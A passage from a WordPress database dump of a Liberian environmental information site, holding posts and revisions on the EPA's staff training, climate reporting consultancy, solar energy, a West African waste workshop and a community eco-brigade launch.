Aquaculture Authority (NaFAA), Mr. Bohmensahn B. Yuan, Director of Marine and Environmental Protection, Liberia Maritime Authority (LiMA), and Mr. Michael Forkpah Garbo, Executive Director, Society for the Conservation of Nature–Liberia (SCNL)</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Together, these representatives highlight Liberia’s commitment to inclusive participation, bringing together government ministries, regulatory agencies, and civil society to shape the future of ocean protection.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Speaking ahead of the session, Mr. Joseph F. Charles emphasized that Liberia’s participation demonstrates its determination to ensure national and regional priorities are reflected in global decisions on ocean governance. He described the gathering as “a pivotal opportunity to align Liberia’s ecological, economic, and diplomatic interests with international commitments to safeguard the ocean.”</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Liberia’s engagement in the treaty process also underscores its support for the global “30x30” goal—protecting 30 percent of the world’s oceans by 2030. The country recognizes the ocean’s critical role in preserving biodiversity, supporting food security, regulating climate, and driving sustainable development.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>By taking part in this historic process, Liberia is reinforcing its commitment to sustainable fisheries, marine biodiversity protection, and regional collaboration under initiatives such as the Guinea Current Large Marine Ecosystem. With its active delegation in New York, Liberia is demonstrating leadership and vision in global ocean conservation and affirming its role as a vital partner in bringing the High Seas Treaty into force—for the benefit of present and future generations.</p>\n<!-- /wp:paragraph -->','Liberia Joins Global Push for the High Seas Treaty at the United Nations','','inherit','closed','closed','','5582-revision-v1','','','2025-08-20 04:45:34','2025-08-20 04:45:34','',5582,'https://ekmsliberia.info/?p=5584',0,'revision','',0),(5585,38,'2025-08-18 04:51:00','2025-08-18 04:51:00','<!-- wp:paragraph -->\n<p>Monrovia – The Environmental Protection Agency of Liberia (EPA) has commended several of its staff for successfully completing certificate programs at the Liberia Institute of Public Administration (LIPA), describing the achievement as a milestone in strengthening the agency’s human resource capacity.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Speaking during a brief program held in the EPA’s conference room, the Executive Director, Dr. Emmanuel K. Urey Yarkpawolo, lauded the graduates for taking the initiative to further their studies while assuring that the EPA remains committed to supporting capacity-building initiatives.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>“I am pleased to see our staff acquiring new skills that will directly enhance their work at the EPA,” Dr. Yarkpawolo said. “The betterment of Liberia depends on each of us, and one way to achieve this is by building our individual and institutional capacities.”</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>The program brought together staff, supervisors, and administrators of the EPA to recognize the efforts of employees who pursued studies in various disciplines ranging from Human Resource Management to Monitoring and Evaluation.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Delivering remarks on behalf of her colleagues, Ms. Grace Biah, Gender Coordinator at the EPA, expressed gratitude to the agency’s leadership for making professional development a priority. She emphasized that the training opportunities will help graduates become more effective in their different departments.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Also speaking, Mr. Jerry Togba, Assistant Director for Training, formally presented the graduates and encouraged them to see their new skills as tools for service. “What you have achieved should not end with a certificate. It should reflect in your work and add value to this institution,” Togba advised.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Sharing her personal experience, Ms. Rose Arthur, Assistant HR Officer, said the training offered her the chance to strengthen her professional background. With a degree in Sociology and Administration, Arthur revealed that her LIPA certificate in Human Resource Management has equipped her with practical knowledge to better serve the HR department.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Other staff members who obtained certifications include Don Angelo George, Princess Yancy, Linford Henries, and Lovetee Vico Jolo. Similarly, Zinnah Kamara, Grace Cooper, and Preston Davis completed training in Monitoring and Evaluation, further enhancing the EPA’s capacity to track and assess environmental projects.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>The EPA management said the recognition of its staff is part of a broader effort to ensure that the institution remains effective in safeguarding Liberia’s environment through knowledge-based leadership and service delivery.</p>\n<!-- /wp:paragraph -->','EPA Celebrates Staff for Advancing Skills Through LIPA Training','','publish','open','open','','epa-celebrates-staff-for-advancing-skills-through-lipa-training','','','2025-08-20 04:55:11','2025-08-20 04:55:11','',0,'https://ekmsliberia.info/?p=5585',42,'post','',0),(5586,38,'2025-08-20 04:54:52','2025-08-20 04:54:52','','EPA STAFF','','inherit','open','closed','','epa-staff','','','2025-08-20 04:54:52','2025-08-20 04:54:52','',5585,'https://ekmsliberia.info/wp-content/uploads/2025/08/EPA-STAFF.jpeg',0,'attachment','image/jpeg',0),(5587,38,'2025-08-20 04:55:08','2025-08-20 04:55:08','<!-- wp:paragraph -->\n<p>Monrovia – The Environmental Protection Agency of Liberia (EPA) has commended several of its staff for successfully completing certificate programs at the Liberia Institute of Public Administration (LIPA), describing the achievement as a milestone in strengthening the agency’s human resource capacity.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Speaking during a brief program held in the EPA’s conference room, the Executive Director, Dr. Emmanuel K. Urey Yarkpawolo, lauded the graduates for taking the initiative to further their studies while assuring that the EPA remains committed to supporting capacity-building initiatives.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>“I am pleased to see our staff acquiring new skills that will directly enhance their work at the EPA,” Dr. Yarkpawolo said. “The betterment of Liberia depends on each of us, and one way to achieve this is by building our individual and institutional capacities.”</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>The program brought together staff, supervisors, and administrators of the EPA to recognize the efforts of employees who pursued studies in various disciplines ranging from Human Resource Management to Monitoring and Evaluation.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Delivering remarks on behalf of her colleagues, Ms. Grace Biah, Gender Coordinator at the EPA, expressed gratitude to the agency’s leadership for making professional development a priority. She emphasized that the training opportunities will help graduates become more effective in their different departments.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Also speaking, Mr. Jerry Togba, Assistant Director for Training, formally presented the graduates and encouraged them to see their new skills as tools for service. “What you have achieved should not end with a certificate. It should reflect in your work and add value to this institution,” Togba advised.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Sharing her personal experience, Ms. Rose Arthur, Assistant HR Officer, said the training offered her the chance to strengthen her professional background. With a degree in Sociology and Administration, Arthur revealed that her LIPA certificate in Human Resource Management has equipped her with practical knowledge to better serve the HR department.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Other staff members who obtained certifications include Don Angelo George, Princess Yancy, Linford Henries, and Lovetee Vico Jolo. Similarly, Zinnah Kamara, Grace Cooper, and Preston Davis completed training in Monitoring and Evaluation, further enhancing the EPA’s capacity to track and assess environmental projects.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>The EPA management said the recognition of its staff is part of a broader effort to ensure that the institution remains effective in safeguarding Liberia’s environment through knowledge-based leadership and service delivery.</p>\n<!-- /wp:paragraph -->','EPA Celebrates Staff for Advancing Skills Through LIPA Training','','inherit','closed','closed','','5585-revision-v1','','','2025-08-20 04:55:08','2025-08-20 04:55:08','',5585,'https://ekmsliberia.info/?p=5587',0,'revision','',0),(5588,38,'2025-08-20 05:16:40','2025-08-20 05:16:40','<strong>BACKGROUND</strong>\r\nThe Environmental Protection Agency (EPA) as mandated by Section 99 of the Environmental\r\nProtection and Management Law (EPML) is the principal authority in Liberia responsible for\r\ncoordinating all Multilateral Environmental Agreements and is empowered to coordinate, monitor,\r\nsupervise and consult with relevant stakeholders on all activities in the protection of the environment\r\nand sustainable use of natural resources.\r\nWith the adoption of the Paris Agreement (PA), adopted at the 21 st Conference of the Parties to the\r\nUnited Nations Framework Convention on Climate Change (UNFCCC COP 21) in December 2015, all\r\ncountries agreed on an Enhanced Transparency Framework (ETF) for action and support (Article 13),\r\nwith built-in flexibility, which considers parties’ different capacities and builds upon collective\r\nexperience. The Paris Agreement sets out a global action plan that puts the world on track to avoid\r\ndangerous climate change by limiting global warming to well below 2°C. It establishes that each Party\r\nshould submit a Nationally Determined Contribution and revise it every five years to achieve the global\r\ngoal of reducing greenhouse gas (GHG) emissions.\r\nIn the context of the ETF, countries are expected to track and report progress towards achieving their\r\nNationally Determined Contributions (NDCs), and communicate adaption actions, including good\r\npractices, priorities, needs and gaps, to inform the global stocktake under Article 14 of the Agreement.\r\nBesides submitting their National Communications (NCs) every four years, signatory countries will be\r\nexpected to submit Biennial Transparency reports (BTRs) including a National Inventory Report every\r\ntwo years starting from December 2024, thus replacing the Biennial Update Reports (BURs).\r\n\r\n<strong>OBJECTIVE</strong>\r\nTo develop PIP for the Second Biennial Transparency Report (BTR2) and Combined Third Biennial\r\nTransparency Report and Fourth National Communication (BTR3/NC4) of the Republic of Liberia. The\r\nPIP shall comply with reporting requirements of the United Nations Framework Convention on Climate\r\nChange (UNFCCC) and Paris Agreement.\r\n\r\nClick:<a href=\"https://ekmsliberia.info/wp-content/uploads/2025/08/Terms-of-Reference-BTR2-BTR3NC4s-PIP.docx\" target=\"_blank\" rel=\"noopener\">Download</a>','Consultancy to Develop PIP for BTR2 and BTR3/NC4 for Liberia.','','publish','closed','closed','','consultancy-to-develop-pip-for-btr2-and-btr3-nc4-for-liberia','','','2025-08-20 05:16:40','2025-08-20 05:16:40','',0,'https://ekmsliberia.info/?post_type=ekms_bulletin&#038;p=5588',40,'ekms_bulletin','',0),(5589,38,'2025-08-20 05:11:53','2025-08-20 05:11:53','<strong>BACKGROUND</strong>\r\nThe Environmental Protection Agency (EPA) as mandated by Section 99 of the Environmental\r\nProtection and Management Law (EPML) is the principal authority in Liberia responsible for\r\ncoordinating all Multilateral Environmental Agreements and is empowered to coordinate, monitor,\r\nsupervise and consult with relevant stakeholders on all activities in the protection of the environment\r\nand sustainable use of natural resources.\r\nWith the adoption of the Paris Agreement (PA), adopted at the 21 st Conference of the Parties to the\r\nUnited Nations Framework Convention on Climate Change (UNFCCC COP 21) in December 2015, all\r\ncountries agreed on an Enhanced Transparency Framework (ETF) for action and support (Article 13),\r\nwith built-in flexibility, which considers parties’ different capacities and builds upon collective\r\nexperience. The Paris Agreement sets out a global action plan that puts the world on track to avoid\r\ndangerous climate change by limiting global warming to well below 2°C. It establishes that each Party\r\nshould submit a Nationally Determined Contribution and revise it every five years to achieve the global\r\ngoal of reducing greenhouse gas (GHG) emissions.\r\nIn the context of the ETF, countries are expected to track and report progress towards achieving their\r\nNationally Determined Contributions (NDCs), and communicate adaption actions, including good\r\npractices, priorities, needs and gaps, to inform the global stocktake under Article 14 of the Agreement.\r\nBesides submitting their National Communications (NCs) every four years, signatory countries will be\r\nexpected to submit Biennial Transparency reports (BTRs) including a National Inventory Report every\r\ntwo years starting from December 2024, thus replacing the Biennial Update Reports (BURs).\r\n\r\n<strong>OBJECTIVE</strong>\r\nTo develop PIP for the Second Biennial Transparency Report (BTR2) and Combined Third Biennial\r\nTransparency Report and Fourth National Communication (BTR3/NC4) of the Republic of Liberia. The\r\nPIP shall comply with reporting requirements of the United Nations Framework Convention on Climate\r\nChange (UNFCCC) and Paris Agreement.\r\n\r\nClick:','Consultancy to Develop PIP for BTR2 and BTR3/NC4 for Liberia.','','inherit','closed','closed','','5588-revision-v1','','','2025-08-20 05:11:53','2025-08-20 05:11:53','',5588,'https://ekmsliberia.info/?p=5589',0,'revision','',0),(5590,38,'2025-08-20 05:14:41','2025-08-20 05:14:41','','Terms of Reference - BTR2-BTR3NC4\'s PIP','','inherit','open','closed','','terms-of-reference-btr2-btr3nc4s-pip','','','2025-08-20 05:14:41','2025-08-20 05:14:41','',0,'https://ekmsliberia.info/wp-content/uploads/2025/08/Terms-of-Reference-BTR2-BTR3NC4s-PIP.docx',0,'attachment','application/vnd.openxmlformats-officedocument.wordprocessingml.document',0),(5591,38,'2025-08-20 05:16:40','2025-08-20 05:16:40','<strong>BACKGROUND</strong>\r\nThe Environmental Protection Agency (EPA) as mandated by Section 99 of the Environmental\r\nProtection and Management Law (EPML) is the principal authority in Liberia responsible for\r\ncoordinating all Multilateral Environmental Agreements and is empowered to coordinate, monitor,\r\nsupervise and consult with relevant stakeholders on all activities in the protection of the environment\r\nand sustainable use of natural resources.\r\nWith the adoption of the Paris Agreement (PA), adopted at the 21 st Conference of the Parties to the\r\nUnited Nations Framework Convention on Climate Change (UNFCCC COP 21) in December 2015, all\r\ncountries agreed on an Enhanced Transparency Framework (ETF) for action and support (Article 13),\r\nwith built-in flexibility, which considers parties’ different capacities and builds upon collective\r\nexperience. The Paris Agreement sets out a global action plan that puts the world on track to avoid\r\ndangerous climate change by limiting global warming to well below 2°C. It establishes that each Party\r\nshould submit a Nationally Determined Contribution and revise it every five years to achieve the global\r\ngoal of reducing greenhouse gas (GHG) emissions.\r\nIn the context of the ETF, countries are expected to track and report progress towards achieving their\r\nNationally Determined Contributions (NDCs), and communicate adaption actions, including good\r\npractices, priorities, needs and gaps, to inform the global stocktake under Article 14 of the Agreement.\r\nBesides submitting their National Communications (NCs) every four years, signatory countries will be\r\nexpected to submit Biennial Transparency reports (BTRs) including a National Inventory Report every\r\ntwo years starting from December 2024, thus replacing the Biennial Update Reports (BURs).\r\n\r\n<strong>OBJECTIVE</strong>\r\nTo develop PIP for the Second Biennial Transparency Report (BTR2) and Combined Third Biennial\r\nTransparency Report and Fourth National Communication (BTR3/NC4) of the Republic of Liberia. The\r\nPIP shall comply with reporting requirements of the United Nations Framework Convention on Climate\r\nChange (UNFCCC) and Paris Agreement.\r\n\r\nClick:<a href=\"https://ekmsliberia.info/wp-content/uploads/2025/08/Terms-of-Reference-BTR2-BTR3NC4s-PIP.docx\" target=\"_blank\" rel=\"noopener\">Download</a>','Consultancy to Develop PIP for BTR2 and BTR3/NC4 for Liberia.','','inherit','closed','closed','','5588-revision-v1','','','2025-08-20 05:16:40','2025-08-20 05:16:40','',5588,'https://ekmsliberia.info/?p=5591',0,'revision','',0),(5593,38,'2025-08-26 19:38:00','2025-08-26 19:38:00','<!-- wp:paragraph -->\n<p>Accra, Ghana, August 26, 2025 – The Executive Director of the Environmental Protection Agency (EPA) of Liberia, Dr. Emmanuel K. Urey Yarkpawolo, says the country is making strong progress in using solar energy to provide electricity for ordinary citizens.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Speaking in an interview with the BBC via telephone from Accra, Ghana Tuesday, Dr. Urey Yarkpawolo said Liberia is currently pushing both small rooftop solar systems and larger projects that will be connected to the national grid. He noted that this approach will allow private individuals and companies to generate power and even sell back extra electricity into the grid.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>“We are building solar systems to tap into the grid, but at the same time, people in the city and in the interior can use small-scale rooftop solar. This will give private individuals the incentive to go renewable,” Dr. Urey Yarkpawolo explained.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>When asked about concerns that Liberia may be relying too heavily on China, which produces most of the world’s solar panels, Dr. Urey Yarkpawolo clarified that while some solar panels come from China, Liberia is also importing from California and other sources.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>“The country is moving towards anybody who is willing to come and partner with Liberia, but also that partnership should not put Liberia at a disadvantaged position,” he said.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>According to him, the government’s target is to use renewable energy to increase access to electricity nationwide within the next five to six years.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>“By 2029 to 2030, the idea is to be able to power the economy so ordinary people have electricity. A lot of effort has been put into place so that in the future, the country can develop,” Dr. Urey Yarkpawolo said.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>The EPA boss stressed that renewable energy is not just about fighting climate change, but also about ensuring that people in the rural parts of Liberia can benefit from electricity like those in the capital.</p>\n<!-- /wp:paragraph -->','EPA Executive Director Says Liberia Moving Fast on Solar Energy Use','','publish','open','open','','epa-executive-director-says-liberia-moving-fast-on-solar-energy-use','','','2025-08-27 19:47:08','2025-08-27 19:47:08','',0,'https://ekmsliberia.info/?p=5593',41,'post','',0),(5594,38,'2025-08-27 19:46:54','2025-08-27 19:46:54','','526092425_1228871735948750_1851029490238126941_n','','inherit','open','closed','','526092425_1228871735948750_1851029490238126941_n','','','2025-08-27 19:46:54','2025-08-27 19:46:54','',5593,'https://ekmsliberia.info/wp-content/uploads/2025/08/526092425_1228871735948750_1851029490238126941_n.jpg',0,'attachment','image/jpeg',0),(5595,38,'2025-08-27 19:47:05','2025-08-27 19:47:05','<!-- wp:paragraph -->\n<p>Accra, Ghana, August 26, 2025 – The Executive Director of the Environmental Protection Agency (EPA) of Liberia, Dr. Emmanuel K. Urey Yarkpawolo, says the country is making strong progress in using solar energy to provide electricity for ordinary citizens.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Speaking in an interview with the BBC via telephone from Accra, Ghana Tuesday, Dr. Urey Yarkpawolo said Liberia is currently pushing both small rooftop solar systems and larger projects that will be connected to the national grid. He noted that this approach will allow private individuals and companies to generate power and even sell back extra electricity into the grid.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>“We are building solar systems to tap into the grid, but at the same time, people in the city and in the interior can use small-scale rooftop solar. This will give private individuals the incentive to go renewable,” Dr. Urey Yarkpawolo explained.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>When asked about concerns that Liberia may be relying too heavily on China, which produces most of the world’s solar panels, Dr. Urey Yarkpawolo clarified that while some solar panels come from China, Liberia is also importing from California and other sources.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>“The country is moving towards anybody who is willing to come and partner with Liberia, but also that partnership should not put Liberia at a disadvantaged position,” he said.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>According to him, the government’s target is to use renewable energy to increase access to electricity nationwide within the next five to six years.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>“By 2029 to 2030, the idea is to be able to power the economy so ordinary people have electricity. A lot of effort has been put into place so that in the future, the country can develop,” Dr. Urey Yarkpawolo said.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>The EPA boss stressed that renewable energy is not just about fighting climate change, but also about ensuring that people in the rural parts of Liberia can benefit from electricity like those in the capital.</p>\n<!-- /wp:paragraph -->','EPA Executive Director Says Liberia Moving Fast on Solar Energy Use','','inherit','closed','closed','','5593-revision-v1','','','2025-08-27 19:47:05','2025-08-27 19:47:05','',5593,'https://ekmsliberia.info/?p=5595',0,'revision','',0),(5598,38,'2025-08-26 14:32:04','2025-08-26 14:32:04','<!-- wp:paragraph -->\n<p>Accra, Ghana – August 26, 2025 – Liberia’s Environmental Protection Agency Executive Director, Dr. Emmanuel K. Urey Yarkpawolo, has highlighted the country’s innovative approaches to waste management and the circular economy during the Western Africa Workshop on Waste Management and the Circular Economy, taking place in Accra, Ghana from August 26 to 28, 2025.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>The workshop brings together government representatives, international organizations, private sector leaders, and civil society actors from across West Africa to discuss data gaps, technical capacity, and evidence-based policymaking to accelerate the Sustainable Development Goals.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>In his opening remarks on Tuesday, Dr. Urey Yarkpawolo addressed participants, saying that waste management is both a national and global priority. He noted that Liberia faces the dual challenge of rapid urbanization and rising waste generation.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>He said Libeia produces over 1.5 million kilograms of waste daily, with more than 84 percent left unmanaged, leading to clogged drainages, frequent flooding, polluted land and water, disease outbreaks, and missed economic opportunities for thousands of young people.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>The EPA Chief Executive Officer emphasized that waste management is not only an environmental issue but also an opportunity for jobs, innovation, and climate action. He said that Liberians are helping themselves but cannot do it alone and need financing to support the deployment of technologies already being developed in the country.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Dr. Yarkpawolo highlighted Liberia’s National Solid Waste Management Policy, adopted in 2024, as a bold framework that promotes recycling, composting, and waste-to-energy solutions while creating space for local entrepreneurship, job creation, and private sector investment.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>\"Policy integrates cost-recovery systems, extended producer responsibility, and public-private partnerships, aligning with Liberia’s ARREST Agenda for Inclusive Development and the Sustainable Development Goals\", he said.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Dr. Urey Yarkpawolo shared two key examples of innovation in Liberia. Green Guard Eco-Solution Incorporated is constructing advanced Phase Osmotic Degradation Systems capable of processing 135,000 tons of municipal solid waste annually.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>\"These systems convert methane into clean electricity, produce biogas for cooking, create compost for agriculture, and generate recyclables for local markets, with plans to build nine of these systems across Liberia, creating thousands of jobs and empowering communities\", he added.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>He named the Transformative Climate Action Pilot Project on Waste Management, supported by the Government of Canada through Novasphere, adding that Novasphere is building five composting centers across Liberia and engaging city mayors, township commissioners, women’s groups, market associations, and traditional leaders as co-designers.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>\"For the first time, Liberia will generate reliable data on waste composition, emissions reductions, and the economic impact of composting\", Dr. Urey Yarkpawolo disclosed.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Other members of the Liberian delegation includes: Hon. Prince Tamba, Deputy Minister for Technical Services, Ministry of Public Works, Margret Beyslow, Assistant Manager, Environmental Research &amp; Radiation Safety at the EPA. Mr. James Karmoh Sowah, Jr, Deputy Head of Presidential Delivery Unit &amp; National Conslutant President Delivery Unit, Ministry of State for Presidential Affairs.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>The workshop, organized by the United Nations Office for Sustainable Development in cooperation with UNEP, the Green Growth Knowledge Partnership, the African Development Bank, and other partners, seeks to strengthen data systems, promote evidence-based policy, and support regional collaboration on waste management and circular economy practices.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Across Western Africa, the challenge of uncollected waste, open dumping, and low recycling rates remains significant, and the region risks becoming the largest contributor to poorly managed plastic waste globally by 2060 without intervention.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>The three-day event includes presentations, country case studies, group discussions, and practical exercises on data collection and policy implementation, and will conclude with a site visit to the Accra Compost and Recycling Plant.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Dr. Yarkpawolo urged regional partners to work together to reduce waste, recover value, and create a cleaner, healthier, and more sustainable future for West Africa.</p>\n<!-- /wp:paragraph -->','EPA Executive Highlights Liberia’s Waste-to-Energy Innovations at West Africa Workshop in Accra','','publish','open','open','','epa-executive-highlights-liberias-waste-to-energy-innovations-at-west-africa-workshop-in-accra','','','2025-08-29 14:50:57','2025-08-29 14:50:57','',0,'https://ekmsliberia.info/?p=5598',40,'post','',0),(5599,38,'2025-08-29 14:34:23','2025-08-29 14:34:23','','CBIT PHOTO','','inherit','open','closed','','cbit-photo','','','2025-08-29 14:34:23','2025-08-29 14:34:23','',5598,'https://ekmsliberia.info/wp-content/uploads/2025/08/CBIT-PHOTO.jpg',0,'attachment','image/jpeg',0),(5600,38,'2025-08-29 14:34:35','2025-08-29 14:34:35','<!-- wp:paragraph -->\n<p>Accra, Ghana – August 26, 2025 – Liberia’s Environmental Protection Agency Executive Director, Dr. Emmanuel K. Urey Yarkpawolo, has highlighted the country’s innovative approaches to waste management and the circular economy during the Western Africa Workshop on Waste Management and the Circular Economy, taking place in Accra, Ghana from August 26 to 28, 2025.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>The workshop brings together government representatives, international organizations, private sector leaders, and civil society actors from across West Africa to discuss data gaps, technical capacity, and evidence-based policymaking to accelerate the Sustainable Development Goals.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>In his opening remarks on Tuesday, Dr. Urey Yarkpawolo addressed participants, saying that waste management is both a national and global priority. He noted that Liberia faces the dual challenge of rapid urbanization and rising waste generation.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>He said Libeia produces over 1.5 million kilograms of waste daily, with more than 84 percent left unmanaged, leading to clogged drainages, frequent flooding, polluted land and water, disease outbreaks, and missed economic opportunities for thousands of young people.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>The EPA Chief Executive Officer emphasized that waste management is not only an environmental issue but also an opportunity for jobs, innovation, and climate action. He said that Liberians are helping themselves but cannot do it alone and need financing to support the deployment of technologies already being developed in the country.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Dr. Yarkpawolo highlighted Liberia’s National Solid Waste Management Policy, adopted in 2024, as a bold framework that promotes recycling, composting, and waste-to-energy solutions while creating space for local entrepreneurship, job creation, and private sector investment.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>\"Policy integrates cost-recovery systems, extended producer responsibility, and public-private partnerships, aligning with Liberia’s ARREST Agenda for Inclusive Development and the Sustainable Development Goals\", he said.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Dr. Urey Yarkpawolo shared two key examples of innovation in Liberia. Green Guard Eco-Solution Incorporated is constructing advanced Phase Osmotic Degradation Systems capable of processing 135,000 tons of municipal solid waste annually.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>\"These systems convert methane into clean electricity, produce biogas for cooking, create compost for agriculture, and generate recyclables for local markets, with plans to build nine of these systems across Liberia, creating thousands of jobs and empowering communities\", he added.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>He named the Transformative Climate Action Pilot Project on Waste Management, supported by the Government of Canada through Novasphere, adding that Novasphere is building five composting centers across Liberia and engaging city mayors, township commissioners, women’s groups, market associations, and traditional leaders as co-designers.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>\"For the first time, Liberia will generate reliable data on waste composition, emissions reductions, and the economic impact of composting\", Dr. Urey Yarkpawolo disclosed.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Other members of the Liberian delegation includes: Hon. Prince Tamba, Deputy Minister for Technical Services, Ministry of Public Works, Margret Beyslow, Assistant Manager, Environmental Research &amp; Radiation Safety at the EPA. Mr. James Karmoh Sowah, Jr, Deputy Head of Presidential Delivery Unit &amp; National Conslutant President Delivery Unit, Ministry of State for Presidential Affairs.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>The workshop, organized by the United Nations Office for Sustainable Development in cooperation with UNEP, the Green Growth Knowledge Partnership, the African Development Bank, and other partners, seeks to strengthen data systems, promote evidence-based policy, and support regional collaboration on waste management and circular economy practices.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Across Western Africa, the challenge of uncollected waste, open dumping, and low recycling rates remains significant, and the region risks becoming the largest contributor to poorly managed plastic waste globally by 2060 without intervention.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>The three-day event includes presentations, country case studies, group discussions, and practical exercises on data collection and policy implementation, and will conclude with a site visit to the Accra Compost and Recycling Plant.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Dr. Yarkpawolo urged regional partners to work together to reduce waste, recover value, and create a cleaner, healthier, and more sustainable future for West Africa.</p>\n<!-- /wp:paragraph -->','EPA Executive Highlights Liberia’s Waste-to-Energy Innovations at West Africa Workshop in Accra','','inherit','closed','closed','','5598-revision-v1','','','2025-08-29 14:34:35','2025-08-29 14:34:35','',5598,'https://ekmsliberia.info/?p=5600',0,'revision','',0),(5601,38,'2025-08-20 14:34:43','2025-08-20 14:34:43','<!-- wp:paragraph -->\n<p>Tubmanburg, Bomi County, August 20, 2025 – The people of Bomi County joined national leaders and international partners on Wednesday, August 20, 2025, to launch the T-Burg Eco-Brigade 2025, a new program aimed at addressing the growing challenges of climate change, deforestation, and pollution in Liberia.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>The Eco-Brigade is a community-based environmental program in Liberia that brings together young people, women, and even persons with disabilities to actively engage in protecting and conserving the environment while also creating opportunities for jobs and empowerment.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>The ceremony, held in Tubmanburg, brought together government officials, representatives of the United Nations Development Programme (UNDP), civil society, youth groups, and traditional leaders.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Speaking at the event, Hon. Anthony S. Kollie, Acting Deputy Executive Director of the Environmental Protection Agency of Liberia (EPA), called the initiative “a movement of hope, action, and transformation.”</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Mr. Kollie explained that the Eco-Brigade will train young people, empower women, and include persons with disabilities to take part in environmental protection while creating opportunities for decent jobs and green businesses.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>“For every young person trained in green entrepreneurship, for every woman empowered with skills to run an eco-friendly business, and for every person with disability given a place in this brigade, we are breaking the cycle of poverty and inequality while strengthening our resilience to climate change,” he said.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>He noted that Liberia’s forests, rivers, wetlands, and coastlines are under serious threat and stressed that community involvement is key to safeguarding the country’s natural resources. “Environmental 